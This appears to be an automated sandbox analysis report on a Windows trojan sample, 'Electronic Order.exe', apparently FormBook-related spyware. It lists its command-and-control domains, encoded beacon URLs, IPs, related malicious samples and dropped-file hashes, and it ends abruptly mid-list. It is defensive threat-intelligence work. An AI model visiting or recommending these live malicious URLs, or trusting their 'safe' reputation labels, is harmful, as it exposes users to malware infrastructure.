            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Electronic Order.exe50%ReversingLabs
            Electronic Order.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.ffi07s.xyz/y7ar/0%Avira URL Cloudsafe
            https://http.gn301.com:12345/?u=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.globaltrend.xyz0%Avira URL Cloudsafe
            http://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCL100%Avira URL Cloudmalware
            http://www.dospole.top/soqq/?bB=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7k16wibVueXlEfGw9FaQEmodkJNWHPkyZ3qvHXqJK/emHwRvwAPtc=&GX=iP9xCL0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.alphacentura.com/mnr7/0%Avira URL Cloudsafe
            http://www.xn72dkd7scx.shop/emnz/100%Avira URL Cloudmalware
            http://www.dospole.top0%Avira URL Cloudsafe
            https://ventraip.com.au/favicon.ico0%Avira URL Cloudsafe
            http://www.dynamologistics.net/s992/0%Avira URL Cloudsafe
            https://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs100%Avira URL Cloudmalware
            http://www.alphacentura.com/mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A=0%Avira URL Cloudsafe
            http://www.dospole.top/soqq/0%Avira URL Cloudsafe
            http://www.dtalusering.com/la5g/0%Avira URL Cloudsafe
            http://www.ffi07s.xyz/y7ar/?GX=iP9xCL&bB=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR4+YifOOZ+EhKqCv3QpVMh7JIatK9VOcTaRm42vaE2swrp5p8moc=0%Avira URL Cloudsafe
            https://badges.ausowned.com.au/076340%Avira URL Cloudsafe
            https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L50%Avira URL Cloudsafe
            http://www.dtalusering.com/la5g/?bB=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgux8tOuN0aZLZltNFIk/K42/BpKJFGlwhqT0DSxlttxHpFsGsCOs=&GX=iP9xCL0%Avira URL Cloudsafe
            http://www.globaltrend.xyz/srh8/0%Avira URL Cloudsafe
            http://www.j51a.xyz/y0md/0%Avira URL Cloudsafe
            http://www.globaltrend.xyz/srh8/?bB=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Xk/GO/xLSHXoOvEtt1Rw61dZpGC5bSCzmgdK2DCxRFg+STwXV1g=&GX=iP9xCL0%Avira URL Cloudsafe
            http://www.dynamologistics.net/s992/?bB=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/pp3mulo7axc+TzXdoadqFnX1TrnWwrCFMVfzI6hQm88OLivvE0I=&GX=iP9xCL0%Avira URL Cloudsafe
            http://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw=&GX=iP9xCL0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.dynamologistics.net
            		35.212.86.52
            		truetrue
              		unknown
              weien.cdn.youziyuncdn.com
              		134.122.138.60
              		truetrue
                		unknown
                www.dtalusering.com
                		103.42.108.46
                		truetrue
                  		unknown
                  www.ffi07s.xyz
                  		188.114.97.3
                  		truetrue
                    		unknown
                    www.globaltrend.xyz
                    		188.114.96.3
                    		truetrue
                      		unknown
                      huayang.302.gn301.xyz
                      		154.222.238.52
                      		truetrue
                        		unknown
                        ghs.googlehosted.com
                        		142.250.186.115
                        		truefalse
                          		unknown
                          www.alphacentura.com
                          		188.114.97.3
                          		truetrue
                            		unknown
                            www.dospole.top
                            		162.254.38.56
                            		truetrue
                              		unknown
                              www.u9games.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.xn72dkd7scx.shop
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.j51a.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.dospole.top/soqq/?bB=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7k16wibVueXlEfGw9FaQEmodkJNWHPkyZ3qvHXqJK/emHwRvwAPtc=&GX=iP9xCLtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.xn72dkd7scx.shop/emnz/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.ffi07s.xyz/y7ar/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCLtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.alphacentura.com/mnr7/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.dynamologistics.net/s992/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.dospole.top/soqq/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.dtalusering.com/la5g/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.ffi07s.xyz/y7ar/?GX=iP9xCL&bB=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR4+YifOOZ+EhKqCv3QpVMh7JIatK9VOcTaRm42vaE2swrp5p8moc=true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.alphacentura.com/mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A=true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.dtalusering.com/la5g/?bB=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgux8tOuN0aZLZltNFIk/K42/BpKJFGlwhqT0DSxlttxHpFsGsCOs=&GX=iP9xCLtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.dynamologistics.net/s992/?bB=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/pp3mulo7axc+TzXdoadqFnX1TrnWwrCFMVfzI6hQm88OLivvE0I=&GX=iP9xCLtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.j51a.xyz/y0md/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw=&GX=iP9xCLfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.globaltrend.xyz/srh8/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.globaltrend.xyz/srh8/?bB=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Xk/GO/xLSHXoOvEtt1Rw61dZpGC5bSCzmgdK2DCxRFg+STwXV1g=&GX=iP9xCLtrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabsfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/ac/?q=sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.globaltrend.xyzsfc.exe, 00000007.00000002.3959870442.000000000433E000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.000000000388E000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://http.gn301.com:12345/?u=sfc.exe, 00000007.00000002.3961770310.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959870442.0000000004662000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003BB2000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.dospole.topBSPmWtBGjJwku.exe, 00000009.00000002.3960768107.0000000005182000.00000040.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.ecosia.org/newtab/sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ventraip.com.au/favicon.icosfc.exe, 00000007.00000002.3959870442.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003246000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5sfc.exe, 00000007.00000002.3959870442.0000000003B64000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2807696663.00000000018B4000.00000004.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ac.ecosia.org/autocomplete?q=sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCssfc.exe, 00000007.00000002.3959870442.000000000401A000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.000000000356A000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://badges.ausowned.com.au/07634sfc.exe, 00000007.00000002.3961770310.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959870442.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003246000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    188.114.97.3
                                    		www.ffi07s.xyzEuropean Union
                                    		13335CLOUDFLARENETUStrue
                                    154.222.238.52
                                    		huayang.302.gn301.xyzSeychelles
                                    		62468VPSQUANUStrue
                                    188.114.96.3
                                    		www.globaltrend.xyzEuropean Union
                                    		13335CLOUDFLARENETUStrue
                                    103.42.108.46
                                    		www.dtalusering.comAustralia
                                    		45638SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUtrue
                                    134.122.138.60
                                    		weien.cdn.youziyuncdn.comUnited States
                                    		64050BCPL-SGBGPNETGlobalASNSGtrue
                                    35.212.86.52
                                    		www.dynamologistics.netUnited States
                                    		19527GOOGLE-2UStrue
                                    142.250.186.115
                                    		ghs.googlehosted.comUnited States
                                    		15169GOOGLEUSfalse
                                    162.254.38.56
                                    		www.dospole.topUnited States
                                    		13768COGECO-PEER1CAtrue

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1471496
                                    Start date and time:2024-07-11 15:03:58 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 9s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Run name:Run with higher sleep bypass
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:2
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Electronic Order.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@7/5@13/8
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HCA Information:
                                    • Successful, ratio: 92%
                                    • Number of executed functions: 56
                                    • Number of non-executed functions: 276
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Electronic Order.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:06:01API Interceptor6358861x Sleep call for process: sfc.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    188.114.97.3http://wolfmax4k.netGet hashmaliciousPhisherBrowse
                                    • wolfmax4k.net/
                                    Document.exeGet hashmaliciousFormBookBrowse
                                    • www.exporationgenius.sbs/x06k/
                                    IdEZn6s5ga.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                    • hqt3.shop/KL341/index.php
                                    msconfig.exeGet hashmaliciousUnknownBrowse
                                    • api.protonvpn.tw:8080/w
                                    run.vbsGet hashmaliciousUnknownBrowse
                                    • console.protonvpn.tw:8080/www
                                    8tvMmyxveyzFcnJ.exeGet hashmaliciousFormBookBrowse
                                    • www.291van.fun/mc10/?M6=0jqVw3fXhgUe9S01oU54GSyQct+tyOMGPM4Q+l1hxxFHWjnqq7dqR8wNeV12RES6q9dV&sZ=Ynzp6xUh
                                    Packing List,BL & Final Invoice.xlsGet hashmaliciousLokibotBrowse
                                    • sini.la/c40mh
                                    HSOwUsZ7hs6Pm4m.exeGet hashmaliciousFormBookBrowse
                                    • www.artfulfusionhub.lat/qogc/
                                    j2vPH4wfF2YxEja.exeGet hashmaliciousFormBookBrowse
                                    • www.artfulfusionhub.lat/qogc/
                                    DY3AojqquRfcmp5.exeGet hashmaliciousFormBookBrowse
                                    • www.9muyiutyt.online/39t8/
                                    188.114.96.3QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                    • filetransfer.io/data-package/TShfhWeB/download
                                    MBL- B-1440 Draft Invoice.exeGet hashmaliciousFormBookBrowse
                                    • www.bt36565.com/sp26/?4h6=/1KZa9AvaqhvDMXduF2ldNHr90z1HjMA2mpitHr9Qz+Cgg020DSQWr96reQsM+sinxEn&vR-XR=BDH8-8sp7L-l1
                                    502407267 RUAG FOODPLAZA.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                    • www.91porn.makeup/vsp3/
                                    Purchase Order.exeGet hashmaliciousLokibotBrowse
                                    • alphabetllc.top/alpha/five/fre.php
                                    msconfig2.exeGet hashmaliciousUnknownBrowse
                                    • image.protonvpn.tw:8080/w
                                    http://my.vrca.ca/_alcd/etr.ashx?etuid=B6EC5EC3-A3FA-4276-9728-F0F26D555086&p=https://microsoft.com@invstrategy.com/DocuSign.htmlGet hashmaliciousUnknownBrowse
                                    • my.vrca.ca/_alcd/etr.ashx?etuid=B6EC5EC3-A3FA-4276-9728-F0F26D555086&p=https://shareingdocuments.xyz/?befvctil
                                    a82WdwCQnQOQf4b.exeGet hashmaliciousFormBookBrowse
                                    • www.txglobedev.com/dy13/?Dxop-=UBZ4HNkXnx40rj&ETU4dv=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI
                                    HSOwUsZ7hs6Pm4m.exeGet hashmaliciousFormBookBrowse
                                    • www.9muyiutyt.online/39t8/
                                    j2vPH4wfF2YxEja.exeGet hashmaliciousFormBookBrowse
                                    • www.9muyiutyt.online/39t8/
                                    Sales Contract Document.bat.exeGet hashmaliciousFormBookBrowse
                                    • www.reignscents.com/45er/?Eb=7nIJSi4w4UDdAxj0bNOrDSFRryI6A1YsHs9hZ4wCm1ZqfM/zmtfDw2BRv7SKM2Ejw2h6&ohrPK2=Txo0d8

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    huayang.302.gn301.xyzInquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                    • 154.12.34.252
                                    www.dtalusering.comInquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                    • 103.42.108.46
                                    www.dynamologistics.netInquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                    • 35.212.86.52
                                    weien.cdn.youziyuncdn.comInquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                    • 134.122.138.60
                                    www.ffi07s.xyzInquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.96.3
                                    www.alphacentura.comInquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.96.3
                                    www.globaltrend.xyzInquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.97.3
                                    www.dospole.topInquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                    • 162.254.38.56

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUInquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                    • 103.42.108.46
                                    rCjg912Ssb.elfGet hashmaliciousMiraiBrowse
                                    • 103.252.154.25
                                    PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                                    • 110.232.143.110
                                    https://members.stageschool.com.au/unsubscribe/Get hashmaliciousUnknownBrowse
                                    • 110.232.143.111
                                    QUOTATION #U2013 RFQ 000535.exeGet hashmaliciousFormBookBrowse
                                    • 110.232.143.110
                                    COTA#U00c7#U00c3O #U2013 RFQ 000535.exeGet hashmaliciousFormBookBrowse
                                    • 110.232.143.110
                                    ftrrrttyt.exeGet hashmaliciousFormBookBrowse
                                    • 110.232.143.110
                                    RFQ2024563429876-9887877654.exeGet hashmaliciousFormBookBrowse
                                    • 110.232.143.110
                                    file.exeGet hashmaliciousCMSBruteBrowse
                                    • 43.250.142.104
                                    TC0931AC.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • 103.42.108.46
                                    CLOUDFLARENETUShttps://c30wcrg676c.typeform.com/to/mw3jJ5WvGet hashmaliciousUnknownBrowse
                                    • 104.19.229.21
                                    https://nnetsasaxrsv.com/apart/057666761araspuchucho172Get hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    vidar0907.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 188.114.97.3
                                    https://www.staffingagencyphoenix.com/Get hashmaliciousUnknownBrowse
                                    • 162.247.243.29
                                    Phishing20240711.zipGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    softorganizer.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 188.114.96.3
                                    lumma0907.exeGet hashmaliciousLummaCBrowse
                                    • 188.114.96.3
                                    MT_056013785200.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 188.114.96.3
                                    https://www.serpro.gov.br/links-fixos-superiores/assinador-digital/assinador-serpro/arquivos/AssinadorSERPRO4.2.1.exeGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    https://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    CLOUDFLARENETUShttps://c30wcrg676c.typeform.com/to/mw3jJ5WvGet hashmaliciousUnknownBrowse
                                    • 104.19.229.21
                                    https://nnetsasaxrsv.com/apart/057666761araspuchucho172Get hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    vidar0907.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 188.114.97.3
                                    https://www.staffingagencyphoenix.com/Get hashmaliciousUnknownBrowse
                                    • 162.247.243.29
                                    Phishing20240711.zipGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    softorganizer.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 188.114.96.3
                                    lumma0907.exeGet hashmaliciousLummaCBrowse
                                    • 188.114.96.3
                                    MT_056013785200.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 188.114.96.3
                                    https://www.serpro.gov.br/links-fixos-superiores/assinador-digital/assinador-serpro/arquivos/AssinadorSERPRO4.2.1.exeGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    https://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    VPSQUANUSqGf6yeA9wI.elfGet hashmaliciousMiraiBrowse
                                    • 69.165.74.76
                                    TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                    • 23.251.54.212
                                    Attendance list.exeGet hashmaliciousFormBookBrowse
                                    • 23.251.54.212
                                    AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                    • 198.44.170.208
                                    Rn1AkuRExh.elfGet hashmaliciousMiraiBrowse
                                    • 103.252.20.91
                                    c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                                    • 198.44.190.49
                                    tpwinprn.dllGet hashmaliciousGhostRatBrowse
                                    • 156.235.99.47
                                    6z70AuHrHI.dllGet hashmaliciousUnknownBrowse
                                    • 156.235.99.47
                                    PI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                                    • 156.235.111.63
                                    2OdHcYtYOMOepjD.exeGet hashmaliciousFormBookBrowse
                                    • 23.251.54.212

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\30-335c-

                                    Download File
                                    Process:C:\Windows\SysWOW64\sfc.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1239949490932863
                                    Encrypted:false
                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                    MD5:271D5F995996735B01672CF227C81C17
                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\aut4F00.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\Electronic Order.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286208
                                    Entropy (8bit):7.99468258334443
                                    Encrypted:true
                                    SSDEEP:6144:h/SgBEFr2rkNagqfzb2vQ2IYfO49mC4VNkcF6Wdn+fF/FYJmC2u:h/VYNagUH2GYfOompVacFN+fdl1u
                                    MD5:225C61445560F7AE947612076F16BEFE
                                    SHA1:05738DC23D0ACC3670C14140EB0CD5DE65AED67F
                                    SHA-256:80CCFFB4EB2F7009B45DFDA32F002C9C9ACC3516A709DEF1758D4BA3A4B34B09
                                    SHA-512:736419BD099B969EA58376B8B8003AD7BEC253B3199D0DC8CBF08ABF3CA68F6F734032011AE36EA884AD3D3C2A21E7E917E26B84E37E8A0FA81000F2C6B6687E
                                    Malicious:false
                                    Reputation:low
                                    Preview:.....4C73.._...}.OM...k4;...VYX04ADONBL4C73AXMVYX04ADONBL4.73AVR.WX.=.e.O...._Z2x=$6?BU,d,/,"[7.Q$x?#7xYZa...b!['R.LUGrYX04ADO7CE.~WT.e-1.ePS.^..vT$.)..j9?....r"+..^P)e-1.X04ADONB.qC7.@YM...j4ADONBL4.71@SL]YX|0ADONBL4C7.UXMVIX04!@ONB.4C'3AXOVY^04ADONBJ4C73AXMV9\04CDONBL4A7s.XMFYX 4ADO^BL$C73AXMFYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04Aj;+:84C7..\MVIX04.@ONRL4C73AXMVYX04AdON"L4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73A

                                    C:\Users\user\AppData\Local\Temp\aut4F2F.tmp

                                    Download File
